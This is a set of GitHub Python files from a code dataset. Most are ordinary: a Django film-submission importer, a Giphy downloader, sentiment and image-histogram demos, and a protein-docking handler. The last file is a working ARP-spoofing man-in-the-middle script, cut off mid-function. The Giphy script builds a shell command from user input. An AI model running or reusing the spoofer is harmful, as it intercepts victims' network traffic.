+{"seq_id": "9047178054", "text": "from collections import namedtuple\n\nfrom datetime import datetime\nfrom django.db import models\n\nfrom submissions.constants import COUNTRIES\nfrom submissions.models import Submission\n\n\nFesthomeData = namedtuple(\n 'FesthomeSubmission',\n ' '.join([\n 'no',\n 'festhome_id',\n 'title',\n 'title_en',\n 'f_E',\n 'length',\n 'f_G',\n 'f_H',\n 'section',\n 'status',\n 'applicant_name',\n 'applicant_lastname',\n 'applicant_date_of_birth',\n 'applicant_code',\n 'applicant_phone',\n 'applicant_email',\n 'applicant_street',\n 'applicant_city',\n 'applicant_postal_code',\n 'applicant_state',\n 'applicant_country',\n 'org_name',\n 'org_email',\n 'org_street',\n 'org_city',\n 'org_postal_code',\n 'org_state',\n 'org_country',\n 'f_AC',\n 'f_AD',\n 'f_AE',\n 'country',\n 'date',\n 'f_AH',\n 'categories',\n 'genre',\n 'theme',\n 'orig_lang',\n 'f_AM',\n 'f_AN',\n 'f_AO',\n 'f_AP',\n 'f_AQ',\n 'f_AR',\n 'synopsis',\n 'f_AT',\n 'f_AU',\n 'f_AV',\n ])\n)\n\n\nCOUNTRIES_DICT = dict((unicode(v), k) for k, v in COUNTRIES)\nCOUNTRIES_DICT['Russia'] = 'RU'\nCOUNTRIES_DICT['United Kingdom'] = 'GB'\nCOUNTRIES_DICT['Macedonia'] = 'MK'\nCOUNTRIES_DICT['United States'] = 'US'\nCOUNTRIES_DICT['Iran'] = 'IR'\nCOUNTRIES_DICT['Montegro'] = 'ME'\nCOUNTRIES_DICT['Serbia'] = 'RS'\nCOUNTRIES_DICT['Kosovo'] = 'RS'\nCOUNTRIES_DICT[u'\\u0411\\u0435\\u043b\\u043e\\u0440\\u0443\\u0441\\u0441\\u0438\\u044f'] = 'BY'\nCOUNTRIES_DICT[u'\\u0420\\u043e\\u0441\\u0441\\u0438\\u044f'] = 'RU'\nCOUNTRIES_DICT[u'\\u0423\\u043a\\u0440\\u0430\\u0438\\u043d\\u0430'] = 'UA'\n\nCOUNTRIES_DICT['SpainUnited Kingdom'] = 'ES'\nCOUNTRIES_DICT['ArgentinaSpain'] = 'AR'\nCOUNTRIES_DICT['SpainUnited States'] = 'ES'\nCOUNTRIES_DICT['CanadaCroatia'] = 'CA'\nCOUNTRIES_DICT['PeruSpain'] = 'PE'\nCOUNTRIES_DICT['GermanyIsrael'] = 'DE'\nCOUNTRIES_DICT['BelgiumFrance'] = 'BE'\nCOUNTRIES_DICT['BrazilPortugal'] = 'BR'\nCOUNTRIES_DICT['Spain (Canary, Ceuta & Melilla)'] = 'ES'\nCOUNTRIES_DICT['BahrainUnited Arab Emirates'] = 'BH'\nCOUNTRIES_DICT['SwitzerlandUnited StatesZambia'] = 'CH'\nCOUNTRIES_DICT['QatarSpain'] = 'QA'\nCOUNTRIES_DICT['Korea, South'] = 'KR'\n\n\nSECTION_DICT = {\n 'Documentary Films': 3,\n}\n\n\nclass FesthomeSubmission(models.Model):\n submission = models.ForeignKey(Submission)\n festhome_id = models.IntegerField(db_index=True)\n\n @classmethod\n def from_data(cls, festhome_data):\n submission = Submission(\n title=festhome_data.title,\n title_en=festhome_data.title_en,\n country=COUNTRIES_DICT.get(festhome_data.country, 'ZZ'),\n section=SECTION_DICT.get(festhome_data.section, 1),\n synopsis=festhome_data.synopsis,\n length=festhome_data.length,\n aspect_ratio=' ',\n year=datetime.strptime(festhome_data.date, '%Y-%m-%d').year,\n premiere=2, # no\n budget=' ',\n attend=0,\n allow_tv=2,\n allow_noncommercial=2,\n allow_network=2,\n backlink=12, # other\n applicant='%s %s' % (\n festhome_data.applicant_name,\n festhome_data.applicant_lastname\n ),\n applicant_email=festhome_data.applicant_email,\n applicant_phone='(%s) %s' % (\n festhome_data.applicant_code,\n festhome_data.applicant_phone\n ),\n applicant_address='%s, %s, %s, %s' % (\n festhome_data.applicant_street,\n festhome_data.applicant_city,\n festhome_data.applicant_state,\n festhome_data.applicant_country\n ),\n director='%s %s' % (\n festhome_data.applicant_name,\n festhome_data.applicant_lastname\n ),\n director_email=festhome_data.applicant_email,\n director_address='%s, %s, %s, %s' % (\n festhome_data.applicant_street,\n 
festhome_data.applicant_city,\n festhome_data.applicant_state,\n festhome_data.applicant_country\n ),\n comment='Import from Festhome',\n )\n submission.save()\n return cls(\n submission=submission,\n festhome_id=festhome_data.festhome_id\n )\n\n", "repo_name": "kinaklub/filmfest.by", "sub_path": "festhome_import/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 10, "usage_type": "call"}, {"api_name": "submissions.constants.COUNTRIES", "line_number": 65, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 98, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 99, "usage_type": "call"}, {"api_name": "submissions.models.Submission", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 99, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 100, "usage_type": "name"}, {"api_name": "submissions.models.Submission", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}]}
+{"seq_id": "6402856960", "text": "import urllib.request\nfrom keys import YOUR_API_KEY\nimport json\nimport os\nimport sys\n\n\n\nif __name__ == \"__main__\":\n to_translate = sys.argv[1]\n results = int(sys.argv[2])\n\n # to_translate = to_translate.replace(\" \", \"+\")\n path = f\"output/translate/{to_translate}\"\n \n if not os.path.isdir(path):\n os.mkdir(path)\n\n print(to_translate)\n\n req = f\"https://api.giphy.com/v1/gifs/translate?api_key={YOUR_API_KEY}&s={to_translate}\"\n\n gif_ids = []\n\n data=json.loads(urllib.request.urlopen(req).read())\n gif_id = data['data']['url']\n\n counter = 0\n\n while len(gif_ids) < results and counter <= 10:\n if gif_id not in gif_ids:\n gif_ids.append(gif_id)\n else:\n data=json.loads(urllib.request.urlopen(req).read())\n gif_id = data['data']['id']\n counter +=1\n\n for i, id in enumerate(gif_ids):\n url = f\"https://media.giphy.com/media/{id}/giphy.gif\"\n print(url,i)\n os.system(f\"curl {url} --output {path}/{to_translate}{i}.gif\")\n \n", "repo_name": "miguelferia/get_gifs", "sub_path": "translategif.py", "file_name": "translategif.py", "file_ext": "py", "file_size_in_byte": 1045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 17, "usage_type": "call"}, {"api_name": "keys.YOUR_API_KEY", "line_number": 21, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 25, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 25, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 34, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 34, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 34, "usage_type": "name"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "36611355197", "text": "# description: This program predicts if the stock price of a company will increase or decrease based on top news headlines\n\n\n# description: this program attempts to optimize a users portfolio using Efficient Frontier\n\n#import the libraries\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom textblob import TextBlob\nimport re\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, classification_report\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nplt.style.use('fivethirtyeight')\n\n### import the data ###\n\n#store the data\nValue = pd.read_csv('Value_DJIA.csv')\nNews = pd.read_csv('News_DJIA.csv')\n\n#Show the first three rows of the news\n\n\n#Merge the data set on the date field\nmerge = News.merge(Value, how='inner', on='Date', left_index = True)\n\n#Combine all of the news headlines into one column\nheadlines = []\nfor row in range(0,len(merge.index)):\n headlines.append(' '.join(str(x) for x in merge.iloc[row, 2:27]))\n\n#print a sample of the combined headlines\n\n#this data set is kinda dirty so lets clean it up\n###Clean Data###\nclean_headlines = []\nfor i in range(0, len(headlines)):\n clean_headlines.append(re.sub(\"b[('\\\\\\\")]\", '', headlines[i])) #remove b'\n\n#Add the clean headlines to the merge data set\nmerge['Combined_News'] = clean_headlines\nmerge.reset_index(inplace=True)\n#Show the new column\npd.set_option('display.max_columns',37) ##show all Columns\n\n\n#Create a function to get the subjectivity\ndef getSubjectivity(text):\n return TextBlob(text).sentiment.subjectivity\n\n#Create a function to get the polarity\ndef getPolarity(text):\n return TextBlob(text).sentiment.polarity\n\n#Create two new columns 'Subjectivity' and 'Polarity'\nmerge['Subjectivity'] = merge['Combined_News'].apply(getSubjectivity)\nmerge['Polarity'] = merge['Combined_News'].apply(getPolarity)\n\n#Show the new data columns in the merge data set\n#print(merge.head)\n\n#Create a function to get the sentimenet scores\ndef getSentimentIntensityAnalyzer(text):\n sia = SentimentIntensityAnalyzer()\n sentiment = sia.polarity_scores(text)\n return sentiment\n\n#Get the sentiment scores for each day\ncompound = [] ## a metric that calculates the sums of all the lexicon ratings which have been normalized over (-1,1)\nneg = []\npos = []\nneu = []\nSIA = 0\n\nfor i in range (0, len(merge['Combined_News'])):\n SIA = getSentimentIntensityAnalyzer(merge['Combined_News'][i])\n compound.append(SIA['compound'])\n neg.append(SIA['neg'])\n neu.append(SIA['neu'])\n pos.append(SIA['pos'])\n\n#Store the sentiment scores in the merge data set\nmerge['Compound'] = compound\nmerge['Negative'] = neg\nmerge['Neutral'] = neu\nmerge['Positive'] = pos\n\n#Create a list of columns to keep\nkeep_columns = ['Open','High', 'Low', 'Volume', 'Subjectivity', 'Polarity', 'Compound', 'Negative', 'Neutral', 'Positive', 'Label']\ndf = merge[keep_columns]\n\nprint(df.head)\n\n#Create the feature data set\nX = df\nX = np.array(X.drop(['Label'],1))\n\n#Create the data target data\nY = np.array(df['Label'])\n\n#Split the data into 80% training and 20% testing data sets\nx_train,x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n#Create and train the model\nmodel = LinearDiscriminantAnalysis().fit(x_train, y_train)\n\n#Show the models predictions\npredictions = 
model.predict(x_test)\nprint(predictions)\n\n#Show the model metrics\nprint(classification_report(y_test, predictions))\n", "repo_name": "CameronCroker/TradingAdvisor", "sub_path": "Sentiment_analysis.py", "file_name": "Sentiment_analysis.py", "file_ext": "py", "file_size_in_byte": 3537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 48, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 57, "usage_type": "call"}, {"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 116, "usage_type": "call"}]}
+{"seq_id": "28437758089", "text": "# import the necessary packages\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\nfrom PIL import Image\n\n# load the image and show it\nimage3 = np.asarray(Image.open(\"sample4.jpg\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\nimage1 = np.asarray(Image.open(\"1.png\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\nimage2 = np.asarray(Image.open(\"4.png\").convert('RGBA').resize((32,32),Image.ANTIALIAS))\n# cv2.imshow(\"image\", image)\n\n# grab the image channels, initialize the tuple of colors,\n# the figure and the flattened feature vector\ni=1\nfor image in [image1,image2,image3]:\n\tchans = cv2.split(image)\n\tcolors = (\"r\", \"g\", \"b\")\n\tplt.figure()\n\tplt.title(\"'Flattened' Color Histogram\")\n\tplt.xlabel(\"Bins\")\n\tplt.ylabel(\"# of Pixels\")\n\tfeatures = []\n\n\t# loop over the image channels\n\tfor (chan, color) in zip(chans, colors):\n\t\t# create a histogram for the current channel and\n\t\t# concatenate the resulting histograms for each\n\t\t# channel\n\t\thist = cv2.calcHist([chan], [0], None, [8], [0, 256])\n\t\thist = hist / sum(hist)\n\n\t\tfeatures.extend(hist)\n\n\t\t# plot the histogram\n\t\tplt.plot(hist, color = color)\n\t\tplt.xlim([0, 8])\n\t\tplt.ylim([0,0.4])\n\n\tplt.savefig(\"Flat3DHist\"+str(i))\n\ti+=1\n", "repo_name": "tpsatish95/image-captioning", "sub_path": "other/Feature Extraction/Demo/3DHist/genHOG.py", "file_name": "genHOG.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.asarray", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 9, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 11, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "cv2.calcHist", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 38, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "31230220021", "text": "import threading\nfrom typeguard import typechecked\nfrom DockingPP.dockingHandler import DockingHandler\nfrom typing import Tuple, TypedDict, List, Optional, Dict\nfrom DockingPP.pose import Pose\nfrom DockingPP.frequencies import Frequencies\nimport logging\nimport ccmap\nimport pypstruct.coordinates as PDB\nimport DockingPP.error as error  # assumption: sibling module defining the error.* exceptions raised below\nPARSER_PDB = PDB.Parser()\n\nclass DockingHandlerZdock(DockingHandler):\n    \"\"\"A class that handles docking results\n    \"\"\"\n\n    def __init__(self, grid_dimension: int, step: float, initial_euler: Tuple[float, float, float], baryRec: Tuple[float, float, float], baryLig: Tuple[float, float, float]):\n        self.grid_dimension: int = grid_dimension\n        \"\"\"size N of the NxNxN grid used in the docking\"\"\"\n        self.step: float = step\n        \"\"\"spacing between grid cells\"\"\"\n        self.initial_euler: Tuple[float, float, float] = initial_euler\n        \"\"\"initial rotation of the ligand in Euler angles\"\"\"\n        self.baryRec: Tuple[float, float, float] = baryRec\n        \"\"\"receptor initial translation to center\"\"\"\n        self.baryLig: Tuple[float, float, float] = baryLig\n        \"\"\"ligand initial translation to center\"\"\"\n        self.ligand: 'pyproteinsExt.structure.coordinates.Structure' = None\n        \"\"\"ligand pdb parsed by pyproteinsExt. Set with setLigand method.\"\"\"\n        self.receptor: 'pyproteinsExt.structure.coordinates.Structure' = None\n        \"\"\"receptor pdb parsed by pyproteinsExt. Set with setReceptor method\"\"\"\n        self.poses: List[Pose] = []\n        \"\"\"List of docking poses. Set with calls to addPose method.\"\"\"\n        self.offsetRec: Tuple[float, float, float] = tuple(\n            [-1 * bary for bary in self.baryRec])\n        \"\"\"Corrected initial translation of receptor\"\"\"\n        self.offsetLig: Tuple[float, float, float] = tuple(\n            [-1 * bary for bary in self.baryLig])\n        \"\"\"Corrected initial translation of ligand\"\"\"\n        self._raw_contact_map: List[List[int]\n                                    ] = None  # Raw contact map from ccmap\n        self.freq: Frequencies = None\n        \"\"\"Object that stores frequency computations. Set with computeFrequencies method.\"\"\"\n        self._nb_rescored_poses: int = 0\n        self._nb_cmap_poses: int = 0\n        self.clusters: Dict[str, Dict[Pose, List[Pose]]] = {}\n        \"\"\"Poses clusters. Dictionary with score as key and a dictionary as value, with the representative pose as key and the other poses that belong to the cluster as value. Set with clusterPoses.\"\"\"\n\n    def __str__(self):\n        return f\"#DockingHandler object\\nGrid dimension : {self.grid_dimension}\\nStep : {self.step}\\nInitial euler vector : {self.initial_euler}\\nNumber of poses : {len(self.poses)}\\nLigand offset : {self.offsetLig}\\nReceptor offset : {self.offsetRec}\"\n\n    def setLigand(self, ligand_pdb: str):\n        \"\"\"Set ligand attribute of class with ligand pdb. \n\n        Args:\n            ligand_pdb (str): Path to ligand pdb\n        \"\"\"\n        logging.info(f\"== Set ligand ==\\nfile: {ligand_pdb}\")\n        self.ligand = PARSER_PDB.load(file=ligand_pdb)\n\n    def setReceptor(self, receptor_pdb: str):\n        \"\"\"Set receptor attribute of class with receptor pdb. \n\n        Args:\n            receptor_pdb (str): Path to receptor pdb\n        \"\"\"\n        logging.info(f\"== Set receptor ==\\nfile: {receptor_pdb}\")\n        self.receptor = PARSER_PDB.load(file=receptor_pdb)\n\n    def addPose(self, pose_index: int, euler: Tuple[float, float, float], translation: Tuple[float, float, float]):\n        \"\"\"Add pose from zdock line information. 
Used in loader.loadZdock\n\n        Args:\n            pose_index (int): Index of the pose\n            euler (Tuple[float, float, float]): Euler vector of the pose\n            translation (Tuple[float, float, float]): Translation vector of the pose\n\n        \"\"\"\n        p = Pose(pose_index, euler, translation)\n        self.poses.append(p)\n\n    def computeContactMap(self, nb_threads: int, nb_poses: int, distance: float = 5):\n        \"\"\"Function that computes the contact map for given poses and distance. It uses the ccmap module, then decodes and stores its results. \n\n        Args:\n            nb_threads (int): Number of threads to compute contact map\n            nb_poses (int): Number of poses to compute contact map\n            distance (float, optional): Distance (in Angstrom) below which two residues are considered in contact. Defaults to 5.\n\n        Raises:\n            error.IncompatiblePoseNumber: Raised when trying to compute on more poses than are loaded. \n        \"\"\"\n        if nb_poses > len(self.poses):\n            raise error.IncompatiblePoseNumber(\n                f\"You are trying to compute contact maps on {nb_poses} poses but only {len(self.poses)} are loaded\")\n        logging.info(\n            f\"== Compute contact map ==\\nnumber of threads : {nb_threads}\\nnumber of poses : {nb_poses}\\ndistance : {distance}\")\n\n        if not self.ligand:\n            raise error.PdbNotSet(\"Ligand is not set. Call setLigand first.\")\n\n        if not self.receptor:\n            raise error.PdbNotSet(\n                \"Receptor is not set. Call setReceptor first.\")\n\n        self._nb_cmap_poses = nb_poses\n        output = [None for i in range(nb_threads)]\n        threadPool = []\n        for i, poses in self._split_poses(nb_poses, nb_threads):\n            threadPool.append(threading.Thread(target=self._ccmap_thread, args=(\n                [p.euler for p in poses], [p.translation for p in poses], i, output, distance)))\n\n        for th in threadPool:\n            th.start()\n\n        for th in threadPool:\n            th.join()\n\n        ccmap_result = [pose for thread in output for pose in thread]\n        self._decodeContactMap(ccmap_result)\n\n    def _ccmap_thread(self, eulers: List[Tuple[float, float, float]], translations: List[Tuple[float, float, float]], thread_number: int, output: List[Optional[int]], distance: float):\n        \"\"\"Prepare a thread for ccmap execution.\n\n        Args:\n            eulers (List[Tuple[float, float, float]]): List of euler vectors for the poses computed by the thread\n            translations (List[Tuple[float, float, float]]): List of translation vectors for the poses computed by the thread\n            thread_number (int): Number of the thread\n            output (List[Optional[int]]): Where the output will be stored\n            distance (float): Distance for contact computation \n        \"\"\"\n        output[thread_number] = ccmap.lzmap(self.receptor.atomDictorize, self.ligand.atomDictorize, eulers,\n                                            translations, d=distance, encode=True, offsetRec=self.offsetRec, offsetLig=self.offsetLig)\n        return\n    \n    def _decodeContactMap(self, ccmap_result: List[List[int]]):\n        \"\"\"Decode ccmap int results. For each pose, decode int into index pairs, and add contact and residues to Pose object. \n\n        Args:\n            ccmap_result (List[List[int]]): ccmap results, list of list of int. 
Each element of the list is the list of encoded contact pairs for one pose.\n \"\"\"\n self._raw_contact_map = []\n ligand_residue_number = self.ligand.residueNumber\n for pose_index in range(len(ccmap_result)): \n pose_contact = ccmap_result[pose_index]\n pose_object = self.poses[pose_index]\n pose_object.contact_computed = True\n residues_index=[(int(i/ligand_residue_number), i % ligand_residue_number) for i in pose_contact]\n for index in residues_index:\n pose_object.addContact(index)\n pose_object.addResidueAtInferface(\"ligand\", index[1])\n pose_object.addResidueAtInferface(\"receptor\", index[0])\n self._raw_contact_map.append(residues_index)\n \n def getRankedClusters(self, ranked_by: str) -> List[Tuple[int, List['DockingPP.pose.Pose']]]:\n \"\"\"Get clusters in decreasing order of given score\n\n Args:\n ranked_by (str): Score to rank by\n\n Raises:\n error.ClustersNotComputed: Raise if clusters are not computed\n error.InvalidScore : Raise if score is not computed or invalid\n\n Returns:\n List[Tuple[int, List[DockingPP.pose.Pose]]]: List of tuples where first element is cluster number and second is the list of poses inside the cluster.\n\n Examples:\n For 1BJ1, get CONSRANK_U clusters and display pose index.\n\n >>> clusters = DH.getRankedClusters(\"CONSRANK_U\")\n >>> for clust in clusters[:2]:\n >>> print(\"cluster :\", clust[0], \"poses :\", [p.index for p in clust[1]])\n cluster : 0 poses : [16, 1, 5, ...]\n cluster : 1 poses : [74, 452, 1212, ...]\n\n \"\"\"\n if not self.clusters:\n raise error.ClustersNotComputed(\n \"Clusters have not been computed. Call clusterPoses first\")\n\n if not ranked_by in self.clusters:\n raise error.InvalidScore(\n f\"{ranked_by} cluster is invalid or not computed\")\n\n nb_cluster = 0\n list_clusters = []\n for rep_pose in self.clusters[ranked_by]:\n list_clusters.append(\n (nb_cluster, [rep_pose] + self.clusters[ranked_by][rep_pose]))\n nb_cluster += 1\n\n return list_clusters\n", "repo_name": "MMSB-MOBI/DockingPP", "sub_path": "src/DockingPP/dockingHandlerZdock.py", "file_name": "dockingHandlerZdock.py", "file_ext": "py", "file_size_in_byte": 9206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pypstruct.coordinates.Parser", "line_number": 11, "usage_type": "call"}, {"api_name": "pypstruct.coordinates", "line_number": 11, "usage_type": "name"}, {"api_name": "DockingPP.dockingHandler.DockingHandler", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 40, "usage_type": "name"}, {"api_name": "DockingPP.frequencies.Frequencies", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, 
{"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 70, "usage_type": "name"}, {"api_name": "DockingPP.pose.Pose", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 110, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "ccmap.lzmap", "line_number": 132, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 155, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 155, "usage_type": "name"}]}
+{"seq_id": "12959979613", "text": "#!/usr/bin/env python3\n\nimport os\nimport time\nimport threading\nimport netifaces as ni\nimport scapy.all as scapy\n\nfrom math import log2\nfrom netfilterqueue import NetfilterQueue\n\n\ndef start_command():\n\tqueue_num = 0\n\tos.system('iptables --flush')\n\tos.system('echo 1 > /proc/sys/net/ipv4/ip_forward') \t# enable IP forwarding\n\tos.system('iptables -I FORWARD -j NFQUEUE --queue-num %d' % queue_num)\n\n\ndef end_command():\n\tos.system('echo 0 > /proc/sys/net/ipv4/ip_forward') \t# disable IP forwarding\n\tos.system('iptables --flush')\n\n\ndef get_device_info():\n\tattacker_ip = scapy.get_if_addr(scapy.conf.iface) \t\t# default interface\n\tattacker_mac = scapy.get_if_hwaddr(scapy.conf.iface) \t# default interface \n\t\n\tgateway = ni.gateways()['default'][ni.AF_INET]\n\taf_inet = ni.ifaddresses(gateway[1])[ni.AF_INET][0]\n\tcidr = 32 - sum([int(log2(256 - int(num))) for num in af_inet['netmask'].split('.')])\n\n\tgateway_ip = gateway[0]\n\ttarget_domain = gateway_ip + '/' + str(cidr)\n\tanswered, unanswered = scapy.arping(target_domain, verbose=False)\n \n\tvictims = list()\n\tprint('Available devices')\n\tprint('+-----------------+-------------------+')\n\tprint('| IP Address      | MAC Address       |')\n\tprint('+-----------------+-------------------+')\n\tfor sent, recv in answered:\n\t\tif (recv.psrc != gateway_ip):\n\t\t\tvictims.append({'ip': recv.psrc, 'mac': recv.hwsrc})\n\t\t\tprint(f'| {recv.psrc:<15s} | {recv.hwsrc:<17s} |')\n\t\telse:\n\t\t\tgateway_mac = recv.hwsrc\n\tprint('+-----------------+-------------------+')\n\n\treturn attacker_ip, attacker_mac, gateway_ip, gateway_mac, victims\n\n\ndef send_arp_spoof_packet(send_ip, recv_ip, recv_mac):\n\tpacket = scapy.ARP(op=\"is-at\", psrc=send_ip, pdst=recv_ip, hwdst=recv_mac) # op=2 --> is-at\n\tscapy.send(packet, verbose=False)\n\n\ndef restore_arp_spoof_packet(src_ip, src_mac, recv_ip, recv_mac):\n\tpacket = scapy.ARP(op=\"is-at\", psrc=src_ip, hwsrc=src_mac, pdst=recv_ip, hwdst=recv_mac)\n\tscapy.send(packet, verbose=False)\n\n\ndef arp_spoofing(gateway_ip, gateway_mac, victims, terminate):\n\twhile True:\n\t\tfor victim in victims:\n\t\t\t# send arp packet to victim\n\t\t\tsend_arp_spoof_packet(\n\t\t\t\tsend_ip=gateway_ip, recv_ip=victim['ip'], recv_mac=victim['mac']\n\t\t\t)\n\t\t\t# send arp packet to gateway\n\t\t\tsend_arp_spoof_packet(\n\t\t\t\tsend_ip=victim['ip'], recv_ip=gateway_ip, recv_mac=gateway_mac\n\t\t\t)\n\t\ttime.sleep(1) \n\t\tif terminate.is_set():\n\t\t\tfor victim in victims:\n\t\t\t\trestore_arp_spoof_packet(\n\t\t\t\t\tsrc_ip=gateway_ip, src_mac=gateway_mac, \n\t\t\t\t\trecv_ip=victim['ip'], recv_mac=victim['mac']\n\t\t\t\t)\n\t\t\t\trestore_arp_spoof_packet(\n\t\t\t\t\tsrc_ip=victim['ip'], src_mac=victim['mac'], \n\t\t\t\t\trecv_ip=gateway_ip, recv_mac=gateway_mac\n\t\t\t\t) \n\t\t\tbreak\n\n\ndef modify_packet(pkt):\n\tdomain_name = 